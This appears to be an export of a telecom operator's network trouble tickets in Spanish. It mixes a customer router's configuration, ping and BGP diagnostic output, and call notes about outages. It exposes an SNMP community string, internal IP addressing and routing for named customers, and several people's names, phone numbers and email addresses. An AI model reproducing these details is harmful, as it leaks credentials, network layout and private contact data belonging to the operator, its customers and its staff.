   FEATURE CLASS-MAP
; -- CLASS-MAP MENU CONFIGURATION --
      CLASS-MAP "RESTRICCION_1M"
         ENTRY 1 DEFAULT
         ENTRY 1 PERMIT
;
      EXIT
;
   EXIT
;
   FEATURE POLICY-MAP
; -- POLICY-MAP MENU CONFIGURATION --
      POLICY-MAP "RESTRICCION_1M"
         CLASS RESTRICCION_1M CONFIGURATION
            POLICE 1024 1536 4096
         EXIT
;
      EXIT
;
   EXIT
;
   NETWORK ETHERNET0/0
; -- ETHERNET INTERFACE USER CONFIGURATION --
      DESCRIPTION "LAN DE CLIENTE"
      IP ACCESS-GROUP 100 IN
;
;
      IP ADDRESS 10.233.85.101 255.255.255.252
;
      SERVICE-POLICY RESTRICCION_1M INPUT
;
;
      REPEATER-SWITCH
; -- SWITCH USER CONFIG --
         PORT 2 DISABLE
         PORT 3 DISABLE
         PORT 4 DISABLE
      EXIT
;
   EXIT
;
   NETWORK ETHERNET0/1
; -- ETHERNET INTERFACE USER CONFIGURATION --
      DESCRIPTION "WAN PRINCIPAL/_/47504180T/_/"
      IP ACCESS-GROUP 100 IN
;
;
      IP ADDRESS 10.103.5.239 255.255.255.128
;
   EXIT
;
   NETWORK CELLULAR1/0
; -- INTERFACE AT. CONFIGURATION  --
      COVERAGE-TIMER 15
      REGISTRATION-APN TYT.CLARO PDP-TYPE IPV4V6
;
      RECORD-CHANGES ENABLE
;
      NETWORK DOMAIN CS+PS
   EXIT
;
;
   NETWORK DIRECT-IP10
; -- GENERIC DIRECT IP ENCAPSULATION USER CONFIGURATION --
      IP ADDRESS DHCP-NEGOTIATED
;
      BASE-INTERFACE
; -- BASE INTERFACE CONFIGURATION --
         BASE-INTERFACE CELLULAR1/1 LINK
         BASE-INTERFACE CELLULAR1/1 PROFILE CLARO_TYT
;
      EXIT
;
      DIRECT-IP
; -- DIRECT IP ENCAPSULATOR USER CONFIGURATION --
         ADDRESS DHCP
         ROUTER IGNORE
      EXIT
;
   EXIT
;
   NETWORK TNIP10
; -- IP TUNNEL NET CONFIGURATION --
      DESCRIPTION "WAN REDUNDANTE"
      DESCRIPTION "WAN REDUNDANTE"
      DESCRIPTION "WAN REDUNDANTE"
      IP ACCESS-GROUP 100 IN
;
;
      IP ADDRESS UNNUMBERED DIRECT-IP10
;
      IP MTU 1380
      IP RELATIVE-WEIGHT 10
      LOAD-INTERVAL 60
      MODE GRE IP
      SOURCE DIRECT-IP10
      DESTINATION 1.2.3.4
      KEEPALIVE 3S 10
   EXIT
;
   NETWORK TNIP20
; -- IP TUNNEL NET CONFIGURATION --
      IP ACCESS-GROUP 100 IN
;
;
      IP ADDRESS UNNUMBERED DIRECT-IP10
;
      IP MTU 1380
      IP RELATIVE-WEIGHT 20
      LOAD-INTERVAL 60
      MODE GRE IP
      SOURCE DIRECT-IP10
      DESTINATION 4.3.2.1
      KEEPALIVE 3S 10
   EXIT
;
   NETWORK LOOPBACK5
; -- LOOPBACK INTERFACE CONFIGURATION --
      DESCRIPTION "MONITOREO DEL CNOC"
      DESCRIPTION "MONITOREO DEL CNOC"
      DESCRIPTION "MONITOREO DEL CNOC"
;
      IP ADDRESS 10.212.196.166 255.255.255.255
;
   EXIT
;
;
;
;
;
;
;
;
;
;
;
;
   PROTOCOL IP
; -- INTERNET PROTOCOL USER CONFIGURATION --
      MANAGEMENT-IP-ADDRESS 10.212.196.166
      ROUTER-ID 10.212.196.166
      ADMINISTRATIVE-DISTANCE
;
      ROUTE 1.2.3.4 255.255.255.255 DIRECT-IP10
      ROUTE 4.3.2.1 255.255.255.255 DIRECT-IP10
      ROUTE 0.0.0.0 0.0.0.0 TNIP10 DISTANCE 160 TRACK NSLA-ADVISOR 20
      ROUTE 0.0.0.0 0.0.0.0 TNIP20 COST 100 DISTANCE 160
;
   EXIT
;
;
   PROTOCOL OSPF
; -- OPEN SPF-BASED ROUTING PROTOCOL CONFIGURATION CONSOLE --
      ENABLE OSPF
;
      AREA 0.0.1.101 DEFAULT
;
      INTERFACE 10.103.5.239 DEFAULT
      INTERFACE 10.103.5.239 AREA 0.0.1.101
      INTERFACE 10.103.5.239 HELLO-INTERVAL 1S
      INTERFACE 10.103.5.239 NETWORK-TYPE BROADCAST
      INTERFACE 10.103.5.239 DEAD-INTERVAL 4S
      INTERFACE 10.103.5.239 ROUTER-PRIORITY 0
;
      INTERFACE 10.212.196.166 DEFAULT
      INTERFACE 10.212.196.166 AREA 0.0.1.101
;
      INTERFACE 10.233.85.101 DEFAULT
      INTERFACE 10.233.85.101 AREA 0.0.1.101
;
      NEIGHBOR ETHERNET0/1 10.103.5.129 YES
;
   EXIT
;
;
;
   PROTOCOL SNMP
; -- SNMP USER CONFIGURATION --
      COMMUNITY NM15SNMPRO SUBNET 10.255.24.144 255.255.255.248
      COMMUNITY NM15SNMPRO SUBNET 190.148.15.192 255.255.255.240
;
      TRAP SENDING-PARAMETERS REACHABILITY-CHECKING IP-ROUTE
      TRAP SENDING-PARAMETERS FORMAT STANDARD
   EXIT
;
;
   FEATURE BANDWIDTH-RESERVATION
; -- BANDWIDTH RESERVATION USER CONFIGURATION --
      NETWORK ETHERNET0/0
         ENABLE
         CLASS CONTROL 100 REAL-TIME
;
         CLASS LOCAL 10
;
         CLASS DEFAULT 40
         CLASS DEFAULT RATE-LIMIT 1024 1536 4096
;
         RATE-LIMIT 1024 1536 4096
      EXIT
;
   EXIT
;
   FEATURE NSM
; -- NETWORK SERVICE MONITOR CONFIGURATION --
      OPERATION 2
; -- NSM OPERATION CONFIGURATION --
         TYPE ECHO IPICMP 1.2.3.4
         FREQUENCY 3
         SOURCE-IPADDR 10.218.54.43
         TIMEOUT 1000
      EXIT
;
      SCHEDULE 2 LIFE FOREVER
      SCHEDULE 2 START-TIME NOW
   EXIT
;
   FEATURE NSLA
; -- FEATURE NETWORK SERVICE LEVEL ADVISOR --
      ENABLE
;
      FILTER 20 DESCRIPTION SONDA-CENTRAL-2
      FILTER 20 DESCRIPTION SONDA-CENTRAL-2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NO CIPHERS ARCFOUR128
         NO CIPHERS ARCFOUR256
         NO CIPHERS ARCFOUR
         NO MACS HMAC-MD5
         NO MACS HMAC-RIPEMD160
         NO MACS HMAC-SHA1-96
         NO MACS HMAC-MD5-96
         ENABLE
      EXIT
;
   EXIT
;
;
   DUMP-COMMAND-ERRORS
   END
CC_TYT_GT_ATM4860 CONFIG$
TABLA ARP DEL ROUTER CPE:
 DUMP ETHERNET0/1
ARP ENTRIES FOR IP PROTOCOL
MAC ADDRESS           IP ADDRESS       TIMEOUT(MIN)
DC-99-14-7A-A2-31     10.103.5.129     238
00-A0-26-C6-50-9D     10.103.5.168     69
00-A0-26-C6-4F-E9     10.103.5.137     105
00-A0-26-C6-53-85     10.103.5.156     39
CC_TYT_GT_ATM4860 ARP+
DUMP ETHERNET0/0
ARP ENTRIES FOR IP PROTOCOL
MAC ADDRESS           IP ADDRESS       TIMEOUT(MIN)
00-07-32-55-C0-68     10.233.85.102    239
CC_TYT_GT_ATM4860 ARP+
DUMP ETHERNET0/1.10
ARP ENTRIES FOR IP PROTOCOL
MAC ADDRESS           IP ADDRESS       TIMEOUT(MIN)
CC_TYT_GT_ATM4860 ARP+
INTERFACES DEL ROUTER:
ETHERNET0/0  UP
ETHERNET0/1  UP
CELLULAR0/0  DOWN
CELLULAR0/1  DOWN
CELLULAR0/2  DOWN
CELLULAR1/0  UP
CELLULAR1/1  UP
CELLULAR1/2  DOWN
WLAN0/0  DOWN
DIRECT-IP10  UP
TNIP10  UP
TNIP20  UP
LOOPBACK5  UP
ETHERNET0/1.10  UP
INTERFACE IP ADDRESSES:
-----------------------
ETHERNET0/0        10.233.85.101/30
ETHERNET0/1        10.103.5.239/25
DIRECT-IP10        DHCP-NEGOTIATED - 10.218.54.43/32
TNIP10             UNNUMBERED - ADDRESS FROM DIRECT-IP10 (10.218.54.43)
TNIP20             UNNUMBERED - ADDRESS FROM DIRECT-IP10 (10.218.54.43)
LOOPBACK5          10.212.196.166/32
SPECIAL IP ADDRESSES:
---------------------
INTERNAL-ADDRESS    0.0.0.0
MANAGEMENT-ADDRESS  10.212.196.166
ROUTER-ID           10.212.196.166
GLOBAL-ADDRESS      10.212.196.166
CC_TYT_GT_ATM4860 IP+
ESTADO Y NIVELES DE RED 3G/LTE:
QUERYING...PLEASE WAIT...
========================================
..:: NETWORK STATUS ::..
========================================
	SIM STATUS: OK
	REGISTRATION STATE: REGISTERED
	PUBLIC LAND MOBILE NETWORK CODE: 70401
	PUBLIC LAND MOBILE NETWORK NAME: CLAROGTM
	NETWORK TECHNOLOGY CURRENTLY IN USE: LTE
	CURRENT SERVICE DOMAIN REGISTERED: CS/PS (CAPABLE CS/PS)
	CURRENT ROAMING STATUS: OFF
	3GPP CELL ID: 000EB016
	RADIO BAND EUTRABAND2_1900_PCS
	LTE TRACKING AREA CODE (TAC): 10B9
	RX LEVEL (DBM): -75
	COVERAGE LEVEL: 4 (**** )
========================================
..:: NETWORK DATA CONNECTION ::..
========================================
    PRIMARY INTERFACE:
	CONNECTION STATUS: CONNECTED
	RADIO ACCESS TECHNOLOGY: LTE
	TRAFFIC CHANNEL STATUS: ACTIVE
	UPLINK FLOW CONTROL: DEACTIVATED
	MAX. TX CHANNEL RATE (BPS): 50000000
	MAX. RX CHANNEL RATE (BPS): 150000000
	IPV4 ADDRESS: 10.218.54.43
	IPV4 MASK: 255.255.255.248
	IPV4 GATEWAY: 10.218.54.44
	IPV4 PRIMARY DNS: 216.230.147.90
	IPV4 SECONDARY DNS: 216.230.128.3
CC_TYT_GT_ATM4860 CELLULAR1/0 AT+
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN TRANSFERENCIAS 10.103.5.239
  PING 10.103.5.239: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.103.5.239 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.27
DISPLAY IP ROUTING-TABLE VPN-INSTANCE TRANSFERENCIAS 10.103.5.239
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : TRANSFERENCIAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.103.5.239/32  DIRECT  0    0                 0.0.0.0         VLANIF10			</t>
  </si>
  <si>
    <t xml:space="preserve">SE PROCEDE A DEJAR EN ETAPA PENDIENTE CLIENTE POR ENERGÍA COMERCIAL EN EL LUGAR
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN TRANSFERENCIAS 10.103.5.239
  PING 10.103.5.239: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.103.5.239 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.27
DISPLAY IP ROUTING-TABLE VPN-INSTANCE TRANSFERENCIAS 10.103.5.239
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : TRANSFERENCIAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.103.5.128/25  DIRECT  0    0             D   10.103.5.129    VLANIF10			</t>
  </si>
  <si>
    <t>F4627086</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO AL 24139090 DA TONO DE  DESCONECTADO || SE INTENTARA LUEGO**
-ID 3001844397
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO AL 24139090 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001834356
**</t>
  </si>
  <si>
    <t>SE LLAA A CLIENTE 24139090 EXT 32530 SUENA DESCONECTADO, SE INTENTARA LUEGO
-ID 3001951772</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO AL 24139090 DA TONO DE  DESCONECTADO || SE INTENTARA LUEGO**
-ID 3001906092
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 24139090 EXT 32530 SUENA DESCONECTADO
-ID 3001838295</t>
  </si>
  <si>
    <t>F4627154</t>
  </si>
  <si>
    <t>SE HABLÓ CON ROBERTO GARCÍA/CLIENTE 00 525551745299 PARA VALIDAR SERVICIO, DEJA DEMASIADO TIEMPO EN ESPERA; SE DEBE INTENTAR MÁS TARDE; ADICIONAL SE LE PIDE APOYO VÍA CORREO:
ASUNTO: RE: SCOTIABANK INTERNACIONAL - PA-MNCSCT0001IN-TDA - CONTR0002277123OC - LATENCIA Y PERDIDA DE PAQUETES</t>
  </si>
  <si>
    <t>ENLACE OPERATIVO SE VALIDA A NIVEL DE CLARO QUE NO SE HA TENIDO RECONVERGENCIA SE PROCEDE A DENVIAR CORREO AL CLEINTE CON EVIDENCIA DEL SERVICIO.
&lt;PPANPAC0N2T1A01A01EID1&gt;PIN -C 1000 -S 1500 -B -M 50 -VPN-INSTANCE SCOTIA_INT 10                                                                                        .17.127.125
  PING 10.17.127.125: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!                                                                                        !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!                                                                                        !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!                                                                                        !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!                                                                                        !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!                                                                                        !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!                                                                                        !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!                                                                                        !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!                                                                                        !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!                                                                                        !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!                                                                                        !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!                                                                                        !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!                                                                                        !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.17.127.125 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/9 MS
&lt;PPANPAC0N2T1A01A01EID1&gt;DISPLAY BGP VPNV4 VPN-INSTANCE  SCOTIA_INT PEER | 10.17.                                                                                        127.125
                                                                          ^
ERROR: UNRECOGNIZED COMMAND FOUND AT '^' POSITION.
&lt;PPANPAC0N2T1A01A01EID1&gt;DISPLAY BGP VPNV4 VPN-INSTANCE  SCOTIA_INT PEER | IN  10                                                                                        .17.127.125
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRI                                                                                        NG YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
 BGP LOCAL ROUTER ID : 10.179.38.7
 LOCAL AS NUMBER : 14754
 VPN-INSTANCE SCOTIA_INT, ROUTER ID 10.179.38.7:
 TOTAL NUMBER OF PEERS : 1                 PEERS IN ESTABLISHED STATE : 1
  PEER                             V          AS  MSGRCVD  MSGSENT  OUTQ  UP/DOW                                                                                        N       STATE  PREFRCV
  10.17.127.125                    4       65503   854634  1070514     0 2259H31                                                                                        M ESTABLISHED       20
&lt;PPANPAC0N2T1A01A01EID1&gt;
PE 10.179.38. 7
&lt;PPANPAC0N2T1A01A01EID1&gt;DISPLAY IP ROUTING-TABLE VPN-INSTANCE SCOTIA_INT 10.17.1                                                                                        27.125
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE                                                                                         ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : SCOTIA_INT
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.17.127.124/30  DIRECT  0    0             D   10.17.127.126   GIGABITETHERN                                                                                        ET1/0/10.1032
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS CUR INTER  GIGABITETHERNET1/0/10.1032
#
INTERFACE GIGABITETHERNET1/0/10.1032
 VLAN-TYPE DOT1Q 1032
 DESCRIPTION ROUTER_SCOTIA-INT_PA
 IP BINDING VPN-INSTANCE SCOTIA_INT
 IP ADDRESS 10.17.127.126 255.255.255.252
 STATISTIC ENABLE
 TRUST UPSTREAM DEFAULT
 QOS-PROFILE RATE_LIMIT_200MBPS INBOUND IDENTIFIER NONE
 QOS-PROFILE TRAFSHAP_200MBPS_PB_22 OUTBOUND IDENTIFIER NONE
#
RETURN</t>
  </si>
  <si>
    <t>***--- CL  RESPONDE CORREO  --***
DE: BRUGADA HERNANDEZ DANIEL [MAILTO:DBRUGADA@UNINET.COM.MX]
ENVIADO EL: LUNES, 4 DE JULIO DE 2022 03:55
PARA: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SCOTIABANK INTERNACIONAL - PA-MNCSCT0001IN-TDA - CONTR0002277123OC - LATENCIA Y PERDIDA DE PAQUETES
ESTIMADOS,
SU APOYO PARA REVISAR SI SE PRESENTARON EVENTOS EN LAS SALIDAS INTERNACIONALES A NIVEL BB QUE PUDIERAN AFECTAR EL SERVICIO.
EN ESTE MOMENTO PERSISTE EL AUMENTO DE LATENCIA.
BEST REGARDS | SALUDOS CORDIALES
   	DANIEL BRUGADA HERNÁNDEZ
OPERADOR CIAP GESTION Y SOPORTE
TEL. (55) 5174 5299</t>
  </si>
  <si>
    <t>F4627155</t>
  </si>
  <si>
    <t>DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: LUNES, 4 DE JULIO DE 2022 3:49
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; BRUGADA HERNANDEZ DANIEL &lt;DBRUGADA@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SCOTIABANK INTERNACIONAL - PA-MNCSCT0001IN-TDA - CONTR0002277123OC - LATENCIA Y PERDIDA DE PAQUETES
ESTIMADO CLIENTE EL MOTIVO DEL CORREO ES PARA PODER BRINDARLE UN SEGUIMIENTO AL ENLACE REPORTADO CON EL SD1140895 CUAL POR NUESTRA PARTE NO TUVIMOS RECONVERGENCIA A NIVEL DE RED SE OBSERVA OPERATIVO SIN LATENCIAS NI PERDIDA DE PAQUETES PODRÍAN APOYARNOS CON VALIDAR QUE SE ENCUENTRE FUNCIONANDO CORRECTAMENTE.
&lt;SSJOCRTMN1W1N01O011AM1&gt;DISPLAY BGP VPNV4 VPN-INSTANCE VPN_SCOTIABANK-GT_0 PEER                                                                                         | I 10.22.2.13
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRI                                                                                        NG YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
 BGP LOCAL ROUTER ID : 10.179.36.104
 LOCAL AS NUMBER : 14754
 VPN-INSTANCE VPN_SCOTIABANK-GT_0, ROUTER ID 10.179.36.104:
 TOTAL NUMBER OF PEERS : 1                 PEERS IN ESTABLISHED STATE : 1
  PEER                             V          AS  MSGRCVD  MSGSENT  OUTQ  UP/DOW                                                                                        N       STATE  PREFRCV
  10.22.2.13                       4       65503   777506   991669     0 2056H00                                                                                        M ESTABLISHED       11
&lt;SSJOCRTMN1W1N01O011AM1&gt;PIN -VPN  VPN_SCOTIABANK-GT_0 10.22.2.13
  PING 10.22.2.13: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.22.2.13: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.22.2.13: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.22.2.13: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.22.2.13: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.22.2.13: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.22.2.13 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;SSJOCRTMN1W1N01O011AM1&gt;</t>
  </si>
  <si>
    <t>SE TIENE UNA RIR 5507280 DONDE SE ESTAN AGREGANDO UNOS EQUIPOS A LAS RED LO CUAL PUEDA HACER QUE LA CONFIGURACION DE PRIORIDAD O METRICA PUEDA CAMBIAR EN LA RED SE SOLICITA VALIDAR CUANDO CULMINE LA VENTANA.</t>
  </si>
  <si>
    <t>NO SE TUVO RECONVERGENCIA EN EL SERVICIO SE VALIDARA CON CLIENTE.
&lt;SSJOCRTMN1W1N01O011AM1&gt;DISPLAY BGP VPNV4 VPN-INSTANCE VPN_SCOTIABANK-GT_0 PEER                                                                                         | I 10.22.2.13
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRI                                                                                        NG YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
 BGP LOCAL ROUTER ID : 10.179.36.104
 LOCAL AS NUMBER : 14754
 VPN-INSTANCE VPN_SCOTIABANK-GT_0, ROUTER ID 10.179.36.104:
 TOTAL NUMBER OF PEERS : 1                 PEERS IN ESTABLISHED STATE : 1
  PEER                             V          AS  MSGRCVD  MSGSENT  OUTQ  UP/DOW                                                                                        N       STATE  PREFRCV
  10.22.2.13                       4       65503   777506   991669     0 2056H00                                                                                        M ESTABLISHED       11
&lt;SSJOCRTMN1W1N01O011AM1&gt;PIN -VPN  VPN_SCOTIABANK-GT_0 10.22.2.13
  PING 10.22.2.13: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.22.2.13: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.22.2.13: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.22.2.13: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.22.2.13: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.22.2.13: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.22.2.13 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;SSJOCRTMN1W1N01O011AM1&gt;</t>
  </si>
  <si>
    <t>F4627172</t>
  </si>
  <si>
    <t>ENLACE OPERATIVO, ALARMA GENERADA POR POSIBLE FALLA DE ENERGIA COMERCIAL EN SITIO, SE PROCEDE A CIERRE
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
NO SE TIENE GESTION DEL CPE
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_METRO 10.174.235.39
  PING 10.174.235.39: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.174.235.39 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.14
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_METRO 10.174.235.39
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_METRO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.174.235.39/32  DIRECT  0    0                 0.0.0.0         VLANIF3740</t>
  </si>
  <si>
    <t>F4627238</t>
  </si>
  <si>
    <t>F4627244</t>
  </si>
  <si>
    <t>SE HABLA CON EL CLIENTE ANA CAÑAS 79100615 QUIEN COMENTA QUE TIENE DOS EXTENSIONES DONDE LOS TELÉFONOS ESTÁN MUERTOS, TODOS LOS DEMÁS TELÉFONOS FUNCIONAN, ENTRAN Y SALEN LLAMADAS. SE LE COMENTA AL CLIENTE QUE EN ESTE CASO SE DEBE ESCALAR EL CASO CON SU PROVEEDOR DE LA PBX YA QUE A NIVEL DE CLARO EL E1 ESTÁ OPERATIVO. CLIENTE ENTERADA ESCALARÁ CON SU PROVEEDOR. SE PROCEDE AL CIERRE DEL CASO. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4627273</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS GALINDO AL 24207200 EXT 2345 NO RESPONDE || SE CORTA LLAMADA || SE INTENTARA LUEGO**
-ID 3001679154
**</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL RESPONDEN PERO CORTAN LA LLAMADA
-ID 3001671172</t>
  </si>
  <si>
    <t>F4627275</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN PALACIOS 71259221 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001674028</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN PALACIOS AL 71259221 CLIENTE SOLICITA SABER CUAL ES LA IP QUE ESTA DANDO PROBLEMAS || SE NOTIFICA A GESTOR **
-ID 30016880034
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN PALACIOS 71259221 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001671915</t>
  </si>
  <si>
    <t>F4627278</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ALEXANDER ALBERTO GONZÁLEZ 22399709 MENCIONA QUE ES DE LA CENTRAL POR LO QUE SOLICITA SE LLAME A  26254200 - ENCARGADO
-ID 3001672255</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 26254200 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001672725</t>
  </si>
  <si>
    <t>F4627281</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIO GOMEZ 76131395 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001673531</t>
  </si>
  <si>
    <t>F4627290</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SARA L. IRIAS 22804000 RESPONDE PERO CORTAN LLAMADA || SE INTENTARA LUEGO**
-ID 3001698484
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SARA L. IRIAS 22804000 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001676277</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SARA L. IRIAS 22804000 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001682917
**</t>
  </si>
  <si>
    <t>F4627319</t>
  </si>
  <si>
    <t>SE APOYARA EN BREVE AL FINALIZAR LLAMADA OR CASO F4626859 SE TIENE A CL POR PRUEBAS</t>
  </si>
  <si>
    <t>F4627320</t>
  </si>
  <si>
    <t>**SE LLAMA A CL FRANCISCO ARDON 77301902 INDICA QUE PERSISTE LA LENTITUD QUE ESTA REALIZANDO PRUEBAS Y SOLO LE LLEGA A 5 MEGAS || SE SOLICITAN DATOS PARA VISITA **
HORARIO DE ATENCION: 7:30 A 16:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS
